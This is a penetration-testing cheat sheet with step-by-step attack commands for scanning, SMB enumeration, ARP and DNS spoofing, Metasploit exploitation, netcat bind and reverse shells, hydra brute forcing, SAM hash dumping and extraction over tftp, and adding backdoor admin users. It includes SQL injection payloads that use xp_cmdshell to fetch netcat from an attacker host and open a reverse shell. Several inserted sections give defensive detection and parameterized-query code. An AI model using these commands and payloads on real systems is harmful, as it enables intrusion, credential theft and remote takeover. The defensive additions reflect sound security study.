Networking
Services
Basics
Footprinting
Scanning
Windows Enumeration
ARP Spoofing
Exploits
Metasploit Framework 3
What to do after gaining a remote shell
TFTP
Netcat
Passwords
Physical Access
SQL Injection
Alternate Data Streams
A White Hat’s Pen Test
Before you begin, change your root password using passwd.
Networking
dhcpcd -get a new IP address
Renew dynamic IP address:
dhcpcd -k -release IP address
ifconfig eth0 up -bring up the NIC
dhcpcd -get a new IP address
Static IP address:
ifconfig eth0 192.168.0.100/24 -set IP address & subnet mask
route add default gw 192.168.0.1 -set default gateway
echo nameserver 192.168.0.1 > /etc/resolv.conf -set DNS server
Services:
Apache server:
apachectl start -start server on TCP port 80
apachectl stop -stop server
SSH server:
sshd-generate -generate ssh keys
/usr/sbin/sshd -start server on TCP port 22
pkill sshd -stop server
ssh user@targetIP
TFTP server:
atftpd --daemon --port 69 /tmp/ -start server on UDP port 69 with a root directory of /tmp
pkill tftpd -stop server
VNC server:
vncserver -start server on TCP port 5901
pkill Xvnc -stop server
Check what ports are listening:
netstat -ant -show listening TCP ports
netstat -anu -show listening UDP ports
netstat -ant | grep 22 -verify ssh has started
netstat -anu | grep 69 -verify tftp has started
Basics
Mount a local hard drive:
mount /dev/hda1 /mnt/hda1
ls -l /mnt/hda1
Mount a Windows network share:
share <user> <targetIP> <remote share>
share admin 10.1.1.2 c$
Enter a password for the remote share.
ls -l /mnt/share/
umount /mnt/share -umount share
Edit a file:
nano test.sh -create a new file and open it
<ctrl> x -exit
Y -save modified buffer
<enter> -write changes
chmod 755 test.sh -make the file executable
./test.sh -run the file
Compile a program:
gcc -o newname exploit.c
gcc -o dcom 66.c
./dcom
Install a new program:
tar zxvf program.tar.gz -method 2: bzip2 -cd program.tar.bz2 | tar xvf -
cd to the new program folder
./configure
make
su root
make install
Footprinting
Whois:
whois target.com -contact info, emails, dates, name servers
whois targetIP -network range
DNS:
dig target.com any
Record types: A, PTR, NS, SOA, SRV, MX
Scanning
scanrand -b10M targetIP:quick
nmap:
-sS - TCP SYN scan or Stealth, half open (default)
-sU - UDP scan
-sT - TCP full connect (very noisy)
-PN - don't ping
-n - no reverse DNS lookup
-A - combines -O and -sV
-O - OS fingerprinting
-sV - service version (banner)
-p - ports to scan (T:port,U:port)
-T - timing (0-5) paranoid, sneaky, polite, normal, aggressive, insane
-iL - input listing of hosts to scan
-oG - grepable output to a file
nmap -sS -PN -n targetIP
nmap -sU -PN -n targetIP
nmap -sT -PN -n targetIP -A -p <open ports> -T5 -oG scan.txt
nmap -sS -p 135,139,445 targetIP
nmap -sS -p T:1433,U:1434 targetIP
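The -oG output written by the scan above is what the rest of the workflow (amap, the Metasploit database import) consumes, and it is also the natural input for a defender's port inventory. The following is an added example, not part of the original cheat sheet: it parses nmap's grepable format (one "Host:" line per host, port entries as port/state/protocol/owner/service/rpc info/version/) into a per-host list and then flags open ports that are not on a per-host allowlist. The sample output and the EXPECTED_OPEN allowlist are constructed for the example; on a real scan you would feed it scan.txt and your own asset list.

```python
import re

# Constructed sample of nmap grepable (-oG) output for three hosts; not a real scan.
SAMPLE_OG = """# Nmap 4.20 scan initiated as: nmap -sS -PN -n -sV -oG scan.txt 10.1.1.0/24
Host: 10.1.1.2 ()\tPorts: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.2.3/, 135/filtered/tcp//msrpc///\tIgnored State: closed (997)
Host: 10.1.1.5 (fileserver)\tPorts: 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-term-serv///\tIgnored State: closed (997)
Host: 10.1.1.9 ()\tStatus: Up
# Nmap done -- 256 IP addresses (3 hosts up) scanned
"""

# One -oG port entry: port/state/protocol/owner/service/rpc info/version/
PORT_RE = re.compile(r"^(\d+)/(\w+)/(\w+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/?$")

# Hypothetical per-host allowlist of ports that are supposed to be open.
EXPECTED_OPEN = {"10.1.1.2": {22, 80}, "10.1.1.5": {139, 445}}


def parse_grepable(text):
    """Map each scanned host to a list of (port, proto, state, service, version)."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        fields = line.split("\t")
        ip = fields[0].split()[1]
        hosts.setdefault(ip, [])
        for field in fields[1:]:
            if not field.startswith("Ports:"):
                continue
            blob = field[len("Ports:"):].strip()
            # Split on the comma that precedes the next "port/" entry so that a
            # comma inside a version string does not break an entry apart.
            for entry in re.split(r",\s+(?=\d+/)", blob):
                m = PORT_RE.match(entry.strip())
                if m:
                    port, state, proto, _owner, service, _rpc, version = m.groups()
                    hosts[ip].append((int(port), proto, state, service, version))
    return hosts


def unexpected_open_ports(hosts, expected):
    """Open ports missing from the allowlist; a host absent from the allowlist gets no exemptions."""
    findings = []
    for ip, ports in hosts.items():
        allowed = expected.get(ip, set())
        for port, _proto, state, service, _version in ports:
            if state == "open" and port not in allowed:
                findings.append((ip, port, service))
    return findings


if __name__ == "__main__":
    inventory = parse_grepable(SAMPLE_OG)
    for ip, ports in inventory.items():
        print(ip, [(p, s) for p, _, st, s, _ in ports if st == "open"])
    print("unexpected:", unexpected_open_ports(inventory, EXPECTED_OPEN))
```

Run it against a real scan.txt by reading the file into parse_grepable; hosts that answered the ping sweep but exposed no ports come back with an empty list, so they are still counted in the inventory.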
AMAP:
Take the results from nmap and check for services on uncommon ports.
amap -i scan.txt
OS Fingerprinting:
p0f -i eth0 -U -p - use interface eth0, don't display unknown signatures, promiscuous
point a browser to the targetIP - read traffic on p0f
xprobe2 -B targetIP
Banner Grabbing
nc targetIP port - check if the port is open
nc 10.1.1.2 80
telnet targetIP port - telnet may yield slightly different results
HEAD / HTTP/1.0
<enter 2x>
wget targetIP - downloads the index.html file
cat index.html | more - view file one page at a time, space bar for next page
q -quit or get out of the file
Windows Enumeration
nmap -sS -p 139,445 targetIP
cd /pentest/enumeration/smb-enum
nbtscan -f targetIP - check to see if NetBIOS is enabled
smbgetserverinfo -i targetIP - name, OS and workgroup
smbdumpusers -i targetIP - list users
smbclient -L //targetIP - list shares
Using Windows
net use \\targetIP\ipc$ "" /u:"" - start a NULL session
smbclient:
smbclient -L hostName -I targetIP - enumerate shares
smbclient -L hostName/share -U "" - connect to open share with a blank user name
smbclient -L hostName -I targetIP -U admin - connect to open share with user name admin
RPCclient
rpcclient targetIP -U "" - start a NULL session
netshareenum - enumerate shares
enumdomusers - enumerate users
lsaenumsid - enumerate domain SIDs
queryuser RID - user info, try 500, 501, 1000, 1001
createdomuser - create user account
ARP Spoofing
ettercap:
nano /usr/local/etc/etter.conf
Under the Linux section, uncomment both lines under iptables.
Sniff > Unified sniffing > Network interface: eth0 > OK
Hosts > Scan for hosts (do this 2 times)
Hosts > Hosts list
Select the default gateway > Add to Target 1
Select the target > Add to Target 2
Mitm > Arp poisoning > Sniff remote connections > OK
Start > Start sniffing
dsniff -i eth0
urlsnarf -i eth0
msgsnarf -i eth0
driftnet -i eth0
DNS spoofing:
nano /usr/local/share/ettercap/etter.dns
Edit the Microsoft lines (target URL) to redirect to the attacker.
Plugins > Manage the plugins > dns_spoof
Mitm > Arp poisoning > Sniff remote connections > OK
Start > Start sniffing
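The ettercap sequence above works by answering ARP for the gateway and the target with the attacker's MAC, so the tell-tale sign on the wire is one IP address suddenly claimed by a second MAC, and one MAC claiming several IPs. The following is an added example, not from the original cheat sheet or from ettercap: a small detector that walks a list of observed ARP replies (constructed here as (time, sender IP, sender MAC) tuples; a real deployment would fill it from periodic "arp -n" polling or a packet capture) and raises an alert when the gateway's MAC changes from a known-good baseline, when any IP-to-MAC mapping changes, or when one MAC claims more than one IP. The gateway address and baseline MAC are assumptions for the example.

```python
from collections import defaultdict

# Assumed for the example: the gateway from the Networking section and a baseline MAC
# recorded for it before the test (e.g. from "arp -n" on a known-clean host).
GATEWAY_IP = "192.168.0.1"
KNOWN_GATEWAY_MAC = "00:11:22:33:44:01"

# Constructed sample of ARP replies seen on the segment (seconds, sender IP, sender MAC);
# these are not real captures.
SAMPLE_ARP_REPLIES = [
    (0.0, "192.168.0.1", "00:11:22:33:44:01"),   # gateway, baseline MAC
    (0.5, "192.168.0.20", "00:11:22:33:44:20"),  # a workstation
    (1.0, "192.168.0.1", "00:11:22:33:44:99"),   # gateway IP now claimed by a new MAC
    (1.1, "192.168.0.20", "00:11:22:33:44:99"),  # the same MAC also claims the workstation
    (2.0, "192.168.0.1", "00:11:22:33:44:99"),   # poisoning keeps being refreshed
]


def detect_arp_spoof(replies, gateway_ip=GATEWAY_IP, known_gateway_mac=KNOWN_GATEWAY_MAC):
    """Return a list of (time, alert_kind, ...) tuples for suspicious ARP replies."""
    ip_to_macs = defaultdict(set)   # every MAC ever seen for an IP
    mac_to_ips = defaultdict(set)   # every IP ever claimed by a MAC
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        # The gateway is the address an attacker must claim to intercept traffic
        # leaving the segment, so it gets a dedicated baseline check.
        if ip == gateway_ip and mac != known_gateway_mac.lower():
            alerts.append((ts, "gateway_mac_mismatch", ip, mac))
        # Any IP that was previously answered by a different MAC.
        if ip_to_macs[ip] and mac not in ip_to_macs[ip]:
            alerts.append((ts, "ip_mac_changed", ip, mac))
        ip_to_macs[ip].add(mac)
        # One MAC answering for several IPs is the signature of the
        # "Target 1 + Target 2" poisoning performed above.
        if ip not in mac_to_ips[mac]:
            mac_to_ips[mac].add(ip)
            if len(mac_to_ips[mac]) > 1:
                alerts.append((ts, "mac_claims_multiple_ips", mac, sorted(mac_to_ips[mac])))
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoof(SAMPLE_ARP_REPLIES):
        print(alert)
```

The duplicate-IP check fires on legitimate events too (a NIC replacement, a failover pair sharing a virtual IP), so treat it as a lead; the gateway baseline check is the one worth paging on. Static ARP entries for the gateway on critical hosts, or dynamic ARP inspection on the switch, prevent the poisoning rather than just detecting it.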
Exploits
cd /pentest/exploits/milw0rm
cat sploitlist.txt | grep -i exploit
Some versions may be written for compilation under Windows, while others for Linux.
You can identify the environment by inspecting the headers.
cat exploit | grep "#include"
Windows: process.h, string.h, winbase.h, windows.h, winsock2.h
Linux: arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/socket.h, sys/types.h, unistd.h
Grep out Windows headers, to leave only Linux based exploits:
cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -u
Metasploit Framework 3
svn update -module updates.
Web Interface:
./msfweb -opens a browser at http://127.0.0.1:55555
Console:
./msfconsole
help
show exploits -show all exploits
search <name> -search for an exploit
use <exploit name>
show options
set <OPTION NAME> <option> -set RHOST 10.1.1.2
show payloads
set PAYLOAD <payload name>
exhibit options
set <OPTION NAME> <option> -set LHOST 10.1.1.2
show targets
set TARGET <target number> -set TARGET 0
exploit -you may need to run the exploit more than one time for it to work
sessions -l -list all sessions
sessions -i <id> -sessions -i 4, interact with session 4
<ctrl> z -detach from session
<ctrl> c -kill a session
jobs -list exploit jobs running
jobs -K -kill all jobs
Auxiliary scanners:
show auxiliary
use <auxiliary name>
set <OPTION NAME> <option>
run
scanner/discovery/sweep_udp
scanner/smb/version
scanner/mssql/mssql_ping
scanner/mssql/mssql_login
Payloads:
Attacker behind firewall: bind shell
Target behind firewall: reverse shell
Automated:
db_import_nessus_nbe -import Nessus results in NBE format
db_import_nmap_xml -import nmap results in XML format (-oX)
./start-db-autopwn
su - postgres
cd /pentest/exploit/framework3
./msfconsole
load db_postgres
db_create
db_nmap targetIP -run nmap through the framework and store results in database
db_hosts -show hosts discovered
db_services -show services running on each host
db_autopwn -show options
db_autopwn -t -p -e -select modules based on open ports, show matching exploits, exploit
Command Line Interface:
./msfcli | grep -i <name> -search for an exploit or auxiliary
./msfcli <exploit or auxiliary> S -summary info
./msfcli <exploit name> <OPTION NAME>=<option> PAYLOAD=<payload name> E
Payload generator:
./msfpayload <payload> <variable=value> <output type>
S summary and options of payload
C C language
P Perl
Y Ruby
R Raw, allows payload to be piped into msfencode and other tools
J JavaScript
X executable (Windows only)
./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C
Encode shellcode:
./msfencode <options> <variable=value>
Pipe the output of msfpayload into msfencode, show bad characters and list available encoders.
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -l
Choose the PexFnstenvMor encoder and format the output to C.
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -e PexFnstenvMor -t c
What to do after gaining a remote shell
hostname -name of computer
net users -list users
net user x hack /add -add user "x" with password "hack"
net user x /add -add user "x" with NO password
net localgroup -list security groups
net localgroup administrators -list users in Administrators group
net localgroup administrators x /add -add user "x" to Administrators group
Don't use interactive programs like FTP from a remote shell.
TFTP
attack box 10.1.1.2
cp /pentest/windows-binaries/tools/nc.exe /tmp/
target box
tftp -i 10.1.1.2 GET nc.exe
TFTP copies files with read-only attributes. So to delete the file:
attrib -r nc.exe
del nc.exe
Netcat
attacker: 10.1.1.1
target: 10.1.1.2
Port scanner:
nc -v -z 10.1.1.2 1-1024 -scan port 1 to 1024
Chat session:
target: nc -lvp 4444 - start Netcat and listen verbosely on port 4444
attacker: nc -v 10.1.1.2 4444
Transfer file to target:
target: nc -lvp 4444 > output.txt
attacker: nc -v 10.1.1.2 4444 < test.txt
Bind shell:
target: nc -lvp 4444 -e cmd.exe -should be sitting at a command prompt of the target
attacker: nc -v 10.1.1.2 4444
Reverse shell:
target: nc -lvp 4444
attacker: nc -v 10.1.1.2 4444 -e /bin/bash
The target should be sitting at an invisible command prompt of the attacker.
You will not see a prompt. Issue any Linux command to verify.
Passwords
Word list:
zcat /pentest/password/dictionaries/wordlist.txt.Z > words
cat words | wc -l
About 306,000 passwords.
Brute force:
ftp with a user name ftp
hydra -l ftp -P words -v targetIP ftp
pop3 with a user name muts
hydra -l muts -P words -v targetIP pop3
snmp
hydra -P words -v targetIP snmp
Microsoft VPN
nmap -p 1723 targetIP
dos2unix words
cat words | thc-pptp-bruter targetIP
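Every hydra run above leaves the same footprint on the target: hundreds of failed logins from one source address inside a few seconds, usually followed by one success. The following is an added example, not from the original cheat sheet: a sliding-window detector over authentication log lines that flags a source IP once it accumulates a threshold of failures within a window, records which user names were tried, and notes whether a successful login from that IP followed. The log lines are constructed in OpenSSH/syslog "Failed password" / "Accepted password" style; the same logic applies to FTP, POP3 or PPTP daemons once their log format is matched by a different regular expression.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample auth log lines in OpenSSH/syslog style; not taken from a real system.
SAMPLE_LOG = """Jan 10 10:00:01 host sshd[2001]: Failed password for ftp from 10.1.1.1 port 40001 ssh2
Jan 10 10:00:02 host sshd[2002]: Failed password for ftp from 10.1.1.1 port 40002 ssh2
Jan 10 10:00:02 host sshd[2003]: Failed password for invalid user muts from 10.1.1.1 port 40003 ssh2
Jan 10 10:00:03 host sshd[2004]: Failed password for ftp from 10.1.1.1 port 40004 ssh2
Jan 10 10:00:04 host sshd[2005]: Failed password for ftp from 10.1.1.1 port 40005 ssh2
Jan 10 10:00:05 host sshd[2006]: Failed password for ftp from 10.1.1.1 port 40006 ssh2
Jan 10 10:00:06 host sshd[2007]: Accepted password for ftp from 10.1.1.1 port 40007 ssh2
Jan 10 10:05:00 host sshd[2008]: Failed password for alice from 10.1.1.50 port 50001 ssh2
Jan 10 10:05:30 host sshd[2009]: Accepted password for alice from 10.1.1.50 port 50002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)"
)


def parse_ts(stamp, year=2000):
    """syslog timestamps carry no year; supply one so they can be compared."""
    return datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")


def detect_bruteforce(text, threshold=5, window_seconds=60):
    """Flag source IPs with >= threshold failed logins inside a sliding window.

    Returns {ip: {"first_alert": datetime, "users": set, "success_after": bool, ...}}.
    """
    failures = defaultdict(deque)   # ip -> timestamps of failures still inside the window
    users_tried = defaultdict(set)  # ip -> user names seen in failures
    flagged = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = parse_ts(m["ts"])
        ip, user, result = m["ip"], m["user"], m["result"]
        if result == "Failed":
            users_tried[ip].add(user)
            q = failures[ip]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_seconds:
                q.popleft()
            if len(q) >= threshold and ip not in flagged:
                flagged[ip] = {"first_alert": ts, "users": set(users_tried[ip]),
                               "success_after": False}
        elif result == "Accepted" and ip in flagged:
            # A success from an address already flagged means the guess worked.
            flagged[ip]["success_after"] = True
            flagged[ip]["success_user"] = user
    return flagged


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, info)
```

A single failure followed by a success (the 10.1.1.50 lines) never reaches the threshold, which keeps ordinary typos out of the alert list; the "success_after" flag is what turns a noisy scan into an incident.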
WYD:
Use wget to download specific files.
wget -r www.target.com --accept=pdf -f switch will read pwdump files
wyd.pl -o output.txt www.target.com/
cat output.txt | more
SAM file:
%SYSTEMROOT%/system32/config -backup copy not locked by the OS
%SYSTEMROOT%/repair
Dumping hashes:
./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp E
meterpreter > upload -r /tmp/pwdump6 c:\\windows\\system32\\
meterpreter > execute -f cmd -c
meterpreter > interact x -where x is the channel created.
C:\WINDOWS\system32> pwdump \\127.0.0.1
John the Ripper:
Paste the hashes into a new file.
nano hash.txt
Delete unneeded accounts.
cp hash.txt /pentest/password/john-1.7.2/run/
cd /pentest/password/john-1.7.2/run/
./john hash.txt
Rainbow Tables:
rcrack *.rt -f hash.txt
Physical Access
Mount an NTFS partition in read/write mode:
Boot your box with Backtrack.
mount
umount /mnt/hda1
modprobe fuse
ntfsmount /dev/hda1 /mnt/hda1
mount
ls -l /mnt/hda1
Dump the SAM file:
bkhive /mnt/sda1/WINDOWS/system32/config/system system.txt
samdump2 /mnt/sda1/WINDOWS/system32/config/sam system.txt > hash.txt
cat hash.txt
Modify SAM file directly:
chntpw /mnt/sda1/WINDOWS/system32/config/SAM
Blank the password. *
Do you really wish to change it? y
Write hive files? y
umount /mnt/sda1
reboot
SQL Injection
nmap -sS -p 1521 targetIP -Oracle
nmap -sS -p T:1433,U:1434 targetIP -MS SQL
Release Version of Sqlservr.exe
SQL Server 2000 RTM 2000.80.194.0
SQL Server 2000 SP1 2000.80.383.0
SQL Server 2000 SP2 2000.80.534.0
SQL Server 2000 SP3 2000.80.760.0
SQL Server 2000 SP3a 2000.80.760.0
SQL Server 2000 SP4 2000.80.00.2039
SQL Server 2005 RTM 2005.90.1399
SQL Server 2005 SP1 2005.90.2047
SQL Server 2005 SP2 2005.90.3042
Authentication bypass:
' or 1=1-- -minus minus closes the SQL query, everything after it is ignored
Enumerating table names:
' having 1=1--
' group by table having 1=1--
' group by table, table2 having 1=1--
' group by table, table2, table3 having 1=1--
Enumerating column types:
' union select sum(column) from table --
' union select sum(column2) from table --
Adding data:
' ; insert into table values('value','value2','value3')--
MS SQL stored procedure:
Output the database information into an html file that you can view with a browser.
' ; exec sp_makewebtask "c:\Inetpub\wwwroot\test.html", "select * from table" ; --
Run ipconfig on the target and write to a file that you can view with a browser.
' or 1=1; exec master..xp_cmdshell ' "ipconfig" > c:\Inetpub\wwwroot\test.txt' ;--
Upload netcat and spawn a reverse shell.
' or 1=1; exec master..xp_cmdshell ' "tftp -i attackIP GET nc.exe && nc.exe attackIP 53 -e cmd.exe' ; --
attacker: nc -lvp 53
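Everything in this section, from the ' or 1=1-- authentication bypass to the stacked xp_cmdshell calls, depends on one coding mistake: user input concatenated into the SQL text. The following is an added example, not from the original cheat sheet: a login check written the vulnerable way beside the same check with bound parameters, run against an in-memory SQLite table with constructed rows, so the bypass payload from the Authentication bypass lines can be seen succeeding against one and failing against the other. The table, rows and function names are assumptions for the example; the database engine differs from the MS SQL targets above, but the comment syntax and the fix are the same.

```python
import sqlite3


def make_db():
    """In-memory users table with constructed sample rows (not real credentials)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (name, password) VALUES (?, ?)",
                     [("admin", "s3cret-admin"), ("muts", "s3cret-muts")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """String concatenation: the user's input becomes part of the SQL statement.

    With username = "' or 1=1--" the statement turns into
    SELECT name FROM users WHERE name = '' or 1=1--' AND password = '...'
    and the comment swallows the password check entirely.
    """
    sql = ("SELECT name FROM users WHERE name = '" + username +
           "' AND password = '" + password + "'")
    return [row[0] for row in conn.execute(sql)]


def login_parameterized(conn, username, password):
    """Bound parameters: values travel separately from the statement text,
    so a quote or a -- inside them is just data and never changes the query."""
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1--"                      # the bypass string from this section
    print("vulnerable    :", login_vulnerable(db, payload, "anything"))
    print("parameterized :", login_parameterized(db, payload, "anything"))
    print("valid login   :", login_parameterized(db, "admin", "s3cret-admin"))
```

The parameterized version also neutralises the ' ; insert ... and ' ; exec ... payloads later in this section, since the driver never lets the bound value start a second statement. The xp_cmdshell lines are a separate lesson: even with injection present they only work when the application's database account is a sysadmin, so the web application's SQL login should hold nothing beyond the rights its own queries need.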
Alternate Data Streams
Hide netcat within a text file. Note netcat must be located in the current directory.
echo "This is a test" > test.txt
type nc.exe > test.txt:nc.exe
del nc.exe
start ./test.txt:nc.exe
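A plain "dir" shows only the 16-byte test.txt after the steps above; the stream is invisible unless you ask for it. The following is an added example, not from the original cheat sheet: a parser for the output of "dir /r" (which lists named $DATA streams on Windows Vista and later) that reports every alternate stream with its size and skips the Zone.Identifier stream that browsers attach to downloads. The listing is constructed for the example; on a real host you would paste or pipe the output of dir /r over the directories you want checked.

```python
import re

# Constructed sample of "dir /r" output (Windows Vista or later); not a real listing.
SAMPLE_DIR_R = r"""
 Directory of C:\temp

01/10/2007  10:00 AM    <DIR>          .
01/10/2007  10:00 AM    <DIR>          ..
01/10/2007  10:01 AM                16 test.txt
                                 59392 test.txt:nc.exe:$DATA
01/10/2007  10:02 AM              1024 download.zip
                                    26 download.zip:Zone.Identifier:$DATA
               2 File(s)           1040 bytes
"""

# Stream lines are indented, carry only a size, and end in file:stream:$DATA.
STREAM_RE = re.compile(r"^\s+([\d,]+)\s+(.+?):([^:\\/]+):\$DATA\s*$")

# Streams that are expected on ordinary files and not worth reporting.
BENIGN_STREAMS = {"Zone.Identifier"}


def find_alternate_streams(listing, ignore=BENIGN_STREAMS):
    """Return (file, stream_name, size_bytes) for each named $DATA stream in a dir /r listing."""
    found = []
    for line in listing.splitlines():
        m = STREAM_RE.match(line)
        if not m:
            continue
        size = int(m.group(1).replace(",", ""))
        fname, stream = m.group(2), m.group(3)
        if stream in ignore:
            continue
        found.append((fname, stream, size))
    return found


if __name__ == "__main__":
    for fname, stream, size in find_alternate_streams(SAMPLE_DIR_R):
        print(f"{fname} carries stream '{stream}' of {size} bytes")
```

A 59 KB stream hanging off a 16-byte text file is exactly the shape the echo/type trick above produces; streams whose size is larger than the host file, or whose name ends in .exe, deserve a look first.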
A White Hat's Pen Test by Muts
nslookup
set type=ns
set type=mx
nmap -sS
nmap -sU
nc -v target.com 23
snmpenum
Solarwinds
tftp the router config file
Use a perl script to decrypt the passwords
Find internal mail server in config file.
nc -n internalserver.com 80
Edit config file to open more ports on the router: 135,139,445,1000
Use Metasploit to send RPC exploit
tftp -i attackIP GET pwdump4.exe
pwdump4.exe \\127.0.0.1>hashes.txt
tftp -i attackIP PUT hashes.txt
Crack hashes with rainbow table.
Use Remote Desktop to connect to server.
Hope it comes in handy in times of need!